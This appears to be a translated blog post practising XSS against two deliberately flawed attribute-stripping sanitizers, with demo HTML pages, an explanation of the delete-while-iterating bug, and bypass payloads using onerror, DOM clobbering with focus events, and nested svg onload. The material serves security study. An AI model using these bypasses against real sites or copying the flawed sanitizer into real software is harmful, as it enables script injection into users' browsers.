XSS practice - cycle and two cycle problem at a time
2022-08-03 21:11:00 【hug kitten】
One loop: demo6.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<form id=x>
<input id=attributes>
<input id=attributes>
</form>
</body>
<script>
console.info(x.attributes);
const data = decodeURIComponent(location.hash.substr(1));
const root = document.createElement('div');
root.innerHTML = data;
// This simulates the XSS filtering process: remove every attribute
for (let el of root.querySelectorAll('*')) {
for (let attr of el.attributes) {
el.removeAttribute(attr.name);
}
}
document.body.appendChild(root);
</script>
</html>
Code analysis
const data = decodeURIComponent(location.hash.substr(1)); // take the value after the # sign
const root = document.createElement('div'); // create a div
root.innerHTML = data; // assign the value after the # sign to the div as HTML
for (let el of root.querySelectorAll('*')) { // select every element under the div
for (let attr of el.attributes) { // get all attributes of each child element
el.removeAttribute(attr.name); // delete every attribute obtained
Test result
We passed in <img src=1 onerror=alert(1)>
But we found that the src=1 attribute was removed while onerror=alert(1) was still preserved. Why is that? Let's first understand the deletion order here; we use breakpoint debugging to test the sequence.
Stepping through with breakpoints, we find that src is entered as the first attribute and is removed; only one attribute, onerror, remains, but the loop counter is now greater than the number of remaining attributes, so that attribute cannot be deleted.
We use a piece of Python code to test the order in which elements are removed:
We find that from array a only 3 values were taken out, whereas we expected 6. This is the problem of deleting while looping.
This is a big problem: when deleting elements we cannot tell which ones get deleted because of the index shift, so we only need a few attempts to bypass a single loop:
<img test=aaa src=1 title=bbb onerror=alert(1)>
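The Python experiment mentioned above is not reproduced on this page, so here is an added illustration (not the author's code) that models the live NamedNodeMap in plain Node.js: the iterator re-reads length on every step and removal shifts later entries down, exactly as in the browser, so the one-loop sanitizer from demo6.html skips every second attribute while the two-loop version from demo4.html removes them all. FakeElement and LiveAttributes are constructed stand-ins, not real DOM objects.

```javascript
// Model of a live NamedNodeMap: like the browser's, the iterator re-reads
// `length` on every step, and removeAttribute() shifts later entries down.
class LiveAttributes {
  constructor(names) { this.items = names.map((name) => ({ name })); }
  get length() { return this.items.length; }
  *[Symbol.iterator]() {
    for (let i = 0; i < this.length; i++) yield this.items[i];
  }
}

// Stand-in for an Element (constructed here; not a real DOM node).
class FakeElement {
  constructor(names) { this.attributes = new LiveAttributes(names); }
  removeAttribute(name) {
    this.attributes.items = this.attributes.items.filter((a) => a.name !== name);
  }
  getAttributeNames() { return this.attributes.items.map((a) => a.name); }
}

// demo6.html: remove while iterating the live collection (buggy).
function sanitizeOneLoop(el) {
  for (const attr of el.attributes) el.removeAttribute(attr.name);
  return el.getAttributeNames(); // names that survived
}

// demo4.html: snapshot the names first, then remove (correct).
function sanitizeTwoLoops(el) {
  const names = [];
  for (const attr of el.attributes) names.push(attr.name);
  for (const name of names) el.removeAttribute(name);
  return el.getAttributeNames();
}

console.log(sanitizeOneLoop(new FakeElement(['src', 'onerror'])));
// -> [ 'onerror' ]
console.log(sanitizeOneLoop(new FakeElement(['test', 'src', 'title', 'onerror'])));
// -> [ 'src', 'onerror' ]  (every second attribute is skipped)
console.log(sanitizeTwoLoops(new FakeElement(['test', 'src', 'title', 'onerror'])));
// -> []
```

With four attributes the padding attributes test and title absorb the deletions, which is why the author's second payload keeps both src and onerror.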
Two loops: demo4.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
</body>
<script>
const data = decodeURIComponent(location.hash.substr(1));
const root = document.createElement('div');
root.innerHTML = data;
// This simulates the XSS filtering process (the sanitizer): remove every attribute
for (let el of root.querySelectorAll('*')) {
let attrs = [];
for (let attr of el.attributes) {
attrs.push(attr.name);
}
for (let name of attrs) {
el.removeAttribute(name);
}
}
document.body.appendChild(root);
</script>
</html>
The two-loop version first puts the attribute names into an array and only then deletes them, so the single-loop problem no longer exists.
So we use two methods to bypass it.
Bypass method 1: DOM clobbering
Make what enters the loop something other than the code we need; that way it doesn't matter if it gets deleted.
So what if we let unused attributes enter the loop, while what we actually need never enters the loop at all?
tabindex: a global attribute that indicates whether its element can be focused and where it participates in sequential keyboard navigation (the Tab key moves focus).
<form%20 tabindex=1 onfocus="alert(1);this.removeAttribute('onfocus'); "autofocus="true"><input name=attributes><input name=attributes></form>
In this way the <form%20 tabindex=1 onfocus="alert(1);this.removeAttribute('onfocus'); "autofocus="true"> is triggered, and what gets deleted are the attributes inside the later <input> elements.
Bypass method 2: never enter the loop
<svg><svg/onload=alert(1)>
Why does a single <svg> not succeed while two do? Because the malicious code can be executed ahead of time, before the filter code runs.
The svg tag blocks DOM construction. DOM operations from JS in turn cause reflow, which has additional effects on DOM tree construction. The DOM tree is only fully built after the JS inside the script tag has finished executing; only then is the following content loaded, and an error while loading that content triggers the error event.
In other words, the malicious code has already executed before entering the loop, so whether it enters the loop or not no longer matters.